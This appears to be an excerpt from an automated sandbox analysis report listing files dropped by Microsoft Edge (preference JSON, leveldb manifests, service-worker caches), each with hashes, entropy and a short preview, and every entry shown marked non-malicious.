                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376620167792921","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):9712
                                                                                                                                                                                                                                                        Entropy (8bit):5.111931167584568
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:st1kdp6s0NsZihUkqE48+bV+FWYQA66WiaFIMYsPGYJ:st1Q6s0NfhmbGxQx6WiaTYS
                                                                                                                                                                                                                                                        MD5:4646C4DFEE1D3900D73E85DB90E066D1
                                                                                                                                                                                                                                                        SHA1:F12A640BFEB84DF4B66E2A378A17C7C68817EFED
                                                                                                                                                                                                                                                        SHA-256:1024A11600EFF96EC1C477A00E6CC285F6DF616D79A4A9E4F788C33A7AB54E90
                                                                                                                                                                                                                                                        SHA-512:3E1D78906F7B7F7654A35E8C09CAEB440EAD8228934C5C8A49D1F41C32B92F2DC29CCF5C2A0EE1A1569C82342B186296B362E2E9C68A83DD1EAD05EE9138397D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376620167792921","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):9712
                                                                                                                                                                                                                                                        Entropy (8bit):5.111931167584568
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:st1kdp6s0NsZihUkqE48+bV+FWYQA66WiaFIMYsPGYJ:st1Q6s0NfhmbGxQx6WiaTYS
                                                                                                                                                                                                                                                        MD5:4646C4DFEE1D3900D73E85DB90E066D1
                                                                                                                                                                                                                                                        SHA1:F12A640BFEB84DF4B66E2A378A17C7C68817EFED
                                                                                                                                                                                                                                                        SHA-256:1024A11600EFF96EC1C477A00E6CC285F6DF616D79A4A9E4F788C33A7AB54E90
                                                                                                                                                                                                                                                        SHA-512:3E1D78906F7B7F7654A35E8C09CAEB440EAD8228934C5C8A49D1F41C32B92F2DC29CCF5C2A0EE1A1569C82342B186296B362E2E9C68A83DD1EAD05EE9138397D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376620167792921","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):9712
                                                                                                                                                                                                                                                        Entropy (8bit):5.111931167584568
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:st1kdp6s0NsZihUkqE48+bV+FWYQA66WiaFIMYsPGYJ:st1Q6s0NfhmbGxQx6WiaTYS
                                                                                                                                                                                                                                                        MD5:4646C4DFEE1D3900D73E85DB90E066D1
                                                                                                                                                                                                                                                        SHA1:F12A640BFEB84DF4B66E2A378A17C7C68817EFED
                                                                                                                                                                                                                                                        SHA-256:1024A11600EFF96EC1C477A00E6CC285F6DF616D79A4A9E4F788C33A7AB54E90
                                                                                                                                                                                                                                                        SHA-512:3E1D78906F7B7F7654A35E8C09CAEB440EAD8228934C5C8A49D1F41C32B92F2DC29CCF5C2A0EE1A1569C82342B186296B362E2E9C68A83DD1EAD05EE9138397D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376620167792921","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):28366
                                                                                                                                                                                                                                                        Entropy (8bit):5.557613120525479
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:EM/8Nf7pLGLP+DWPmwfe18F1+UoAYDCx9Tuqh0VfUC9xbog/OVVgeC1rwHuplNt7:EM/8NZcP+DWPmwfe1u1jawJC+HKt7
                                                                                                                                                                                                                                                        MD5:A1DED5173165A148B64515DF6BC01AB4
                                                                                                                                                                                                                                                        SHA1:29F3D8C6CE27D7A868B95659131160CC47C56E0E
                                                                                                                                                                                                                                                        SHA-256:A08CE64E9484674802A5CD077E30CDE68A8A590397A5C97B2D142141F471C3B2
                                                                                                                                                                                                                                                        SHA-512:A34352C1F2D9FB155374B14B2A9A59973EB83287B31EF18D429941EF556985AE630079A1BC5BF177D6C84E75F105A90F60E417DF9401B33F301D7400DA2DC3B8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376620167251414","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376620167251414","location":5,"ma
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):28366
                                                                                                                                                                                                                                                        Entropy (8bit):5.557613120525479
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:EM/8Nf7pLGLP+DWPmwfe18F1+UoAYDCx9Tuqh0VfUC9xbog/OVVgeC1rwHuplNt7:EM/8NZcP+DWPmwfe1u1jawJC+HKt7
                                                                                                                                                                                                                                                        MD5:A1DED5173165A148B64515DF6BC01AB4
                                                                                                                                                                                                                                                        SHA1:29F3D8C6CE27D7A868B95659131160CC47C56E0E
                                                                                                                                                                                                                                                        SHA-256:A08CE64E9484674802A5CD077E30CDE68A8A590397A5C97B2D142141F471C3B2
                                                                                                                                                                                                                                                        SHA-512:A34352C1F2D9FB155374B14B2A9A59973EB83287B31EF18D429941EF556985AE630079A1BC5BF177D6C84E75F105A90F60E417DF9401B33F301D7400DA2DC3B8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376620167251414","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376620167251414","location":5,"ma
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):28366
                                                                                                                                                                                                                                                        Entropy (8bit):5.557613120525479
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:EM/8Nf7pLGLP+DWPmwfe18F1+UoAYDCx9Tuqh0VfUC9xbog/OVVgeC1rwHuplNt7:EM/8NZcP+DWPmwfe1u1jawJC+HKt7
                                                                                                                                                                                                                                                        MD5:A1DED5173165A148B64515DF6BC01AB4
                                                                                                                                                                                                                                                        SHA1:29F3D8C6CE27D7A868B95659131160CC47C56E0E
                                                                                                                                                                                                                                                        SHA-256:A08CE64E9484674802A5CD077E30CDE68A8A590397A5C97B2D142141F471C3B2
                                                                                                                                                                                                                                                        SHA-512:A34352C1F2D9FB155374B14B2A9A59973EB83287B31EF18D429941EF556985AE630079A1BC5BF177D6C84E75F105A90F60E417DF9401B33F301D7400DA2DC3B8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376620167251414","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376620167251414","location":5,"ma
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2294
                                                                                                                                                                                                                                                        Entropy (8bit):5.831753888304129
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:F2em3trdDUfBpqFXrdw6ghJrdD3Bpq8rdQBpqM:F1m3txDU7qZxv8JxDzq8xGqM
                                                                                                                                                                                                                                                        MD5:D646A087046B8B3B2CC611AE9A954FDE
                                                                                                                                                                                                                                                        SHA1:56910B50B8D0BE386CED97EA5E6E5D78E027D286
                                                                                                                                                                                                                                                        SHA-256:185570948C7B6EFF5B1EAD442B7876208B2B0C61D4D04D80834CE644995D3ED3
                                                                                                                                                                                                                                                        SHA-512:EB093E836F7D496E876DA020DFAB555B1F4B5F30405C82D1FDBC58BCCEA31DD2ADEA02DC7D5B245D9B08561FF047114CF43AE129E93B108471AA5F136F756419
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.27..&m................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):299
                                                                                                                                                                                                                                                        Entropy (8bit):5.146648731727651
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHMRh1923oH+TcwtE/a252KLlVHMcQ+q2P923oH+TcwtE/a2ZIFUv:nasYeb8xL/tv4Yeb8J2FUv
                                                                                                                                                                                                                                                        MD5:DD641CB9AF3A6D02B1694D5277C635BA
                                                                                                                                                                                                                                                        SHA1:1C340ACF814732168CEED551F125D4DCBF6146CE
                                                                                                                                                                                                                                                        SHA-256:5A9F65D272F109AA2C90F878191A788E9DD4E2CB54DA0A7EA8FC3B48E9A439F5
                                                                                                                                                                                                                                                        SHA-512:E437C0D2FF31BC8D7277C125F3F35CC5DC68A0532335F434BCA51D56979147AF7C52CD78ED6BB9198254E6F8856BBDBC374947DB89ABB7C822D858B3433ED34C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:42.427 1df8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/20-18:49:42.449 1df8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):114171
                                                                                                                                                                                                                                                        Entropy (8bit):5.577289715399066
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:AU906yxPXfOxr1lhCe1nL/rmL/rBZXECjAWNKZpcktoBA:d9LyxPXfOxr1lMe1nL/CL/TXEmaCK
                                                                                                                                                                                                                                                        MD5:0CD76CE6F21218FBFD98F9A0F91779E7
                                                                                                                                                                                                                                                        SHA1:39BE6F2283DB81FFE043C48CA366147F9E492A00
                                                                                                                                                                                                                                                        SHA-256:0A417253B07B537CB885F044AAC19CF0EAC2C9DAE9904F9E52A18EAA6C69FCAA
                                                                                                                                                                                                                                                        SHA-512:6A9D40BD76E82C465568862D9D3A8304EE5E31348D8620263465EE80D4E2D6CB7A62A6998B162DAFA79A761C06CC7BFD82162D48AB95F570C2BC0E46E92CD9CD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):188681
                                                                                                                                                                                                                                                        Entropy (8bit):6.38530942349104
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:0FqKLDJbEbwq3hIU8L/cZMG+oV43JqklJ:ZbwOI/L/UBd4B3
                                                                                                                                                                                                                                                        MD5:220B3AD8F4AA09FB708F57F63F09C5BC
                                                                                                                                                                                                                                                        SHA1:00DD014122197F54540285C4F1B429E292E4E4B9
                                                                                                                                                                                                                                                        SHA-256:1616F5C3CF7FED48980627CAF275E0DEA5E1F235C0600107EB9B13D44274D481
                                                                                                                                                                                                                                                        SHA-512:A40E52C6854138743834C2273D85AC1CBD3F73EAA271B766E6E000FB8EDF3B29C5B737062267AD5B055CB2AE38A6E7C4D0545BA96F97182C6E7BD33AF716D16D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:0\r..m..........rSG.....0....z3.................;.....x..........,T.8..`,.....L`.....,T...`......L`......Rc........exports...Rc........module....Rc..`.....define....Rb..-.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m.F.Tyb...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....W...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                                                                        Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                        MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                        SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                        SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                        SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:0\r..m..................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                        Entropy (8bit):3.5271500973417917
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:ud+cyyXl/lUn/lxEUsJzzy:uEcNRU
                                                                                                                                                                                                                                                        MD5:E8606445DB4E8A3DD4A1A2999E5232DB
                                                                                                                                                                                                                                                        SHA1:BE8E0C8262C21FCEA441553810DC7ABB5EA9B444
                                                                                                                                                                                                                                                        SHA-256:389E07ED50BDD20FB201BF1E9E4F4D10063AD99F1A93152ECEB8BE5AAAD7BA26
                                                                                                                                                                                                                                                        SHA-512:FC374DB38CF69654C5805B82ECFCB920BEBD8B6162D7338ACB3D5CEE5BFA98EB1AD78FADD13ECAB00D57C07AF55B3626A771BBA2FF7848ACCEEB24A585B3DFC6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:@...[H..oy retne.........................X....,..................V.../.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                        Entropy (8bit):3.5271500973417917
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:ud+cyyXl/lUn/lxEUsJzzy:uEcNRU
                                                                                                                                                                                                                                                        MD5:E8606445DB4E8A3DD4A1A2999E5232DB
                                                                                                                                                                                                                                                        SHA1:BE8E0C8262C21FCEA441553810DC7ABB5EA9B444
                                                                                                                                                                                                                                                        SHA-256:389E07ED50BDD20FB201BF1E9E4F4D10063AD99F1A93152ECEB8BE5AAAD7BA26
                                                                                                                                                                                                                                                        SHA-512:FC374DB38CF69654C5805B82ECFCB920BEBD8B6162D7338ACB3D5CEE5BFA98EB1AD78FADD13ECAB00D57C07AF55B3626A771BBA2FF7848ACCEEB24A585B3DFC6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:@...[H..oy retne.........................X....,..................V.../.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                        Entropy (8bit):3.5271500973417917
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:ud+cyyXl/lUn/lxEUsJzzy:uEcNRU
                                                                                                                                                                                                                                                        MD5:E8606445DB4E8A3DD4A1A2999E5232DB
                                                                                                                                                                                                                                                        SHA1:BE8E0C8262C21FCEA441553810DC7ABB5EA9B444
                                                                                                                                                                                                                                                        SHA-256:389E07ED50BDD20FB201BF1E9E4F4D10063AD99F1A93152ECEB8BE5AAAD7BA26
                                                                                                                                                                                                                                                        SHA-512:FC374DB38CF69654C5805B82ECFCB920BEBD8B6162D7338ACB3D5CEE5BFA98EB1AD78FADD13ECAB00D57C07AF55B3626A771BBA2FF7848ACCEEB24A585B3DFC6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:@...[H..oy retne.........................X....,..................V.../.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):5141
                                                                                                                                                                                                                                                        Entropy (8bit):3.4298071313394445
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:swQEWtJf7P2D55ymApmVkVDF9Xp++X+VivokLQ5SLl9iSrvy1vzxY:h47P2D58T0VkV59Xp++XKivDE5SLl9iv
                                                                                                                                                                                                                                                        MD5:96181F93F5EF6F6AD3A62D814EE81F52
                                                                                                                                                                                                                                                        SHA1:10B2CF3DEDCC812E626608F6655990F21C4C7DB9
                                                                                                                                                                                                                                                        SHA-256:99E018D477C3D4A1A105EAF3569C865308798CB5FCD0E920AA54682894F14DE5
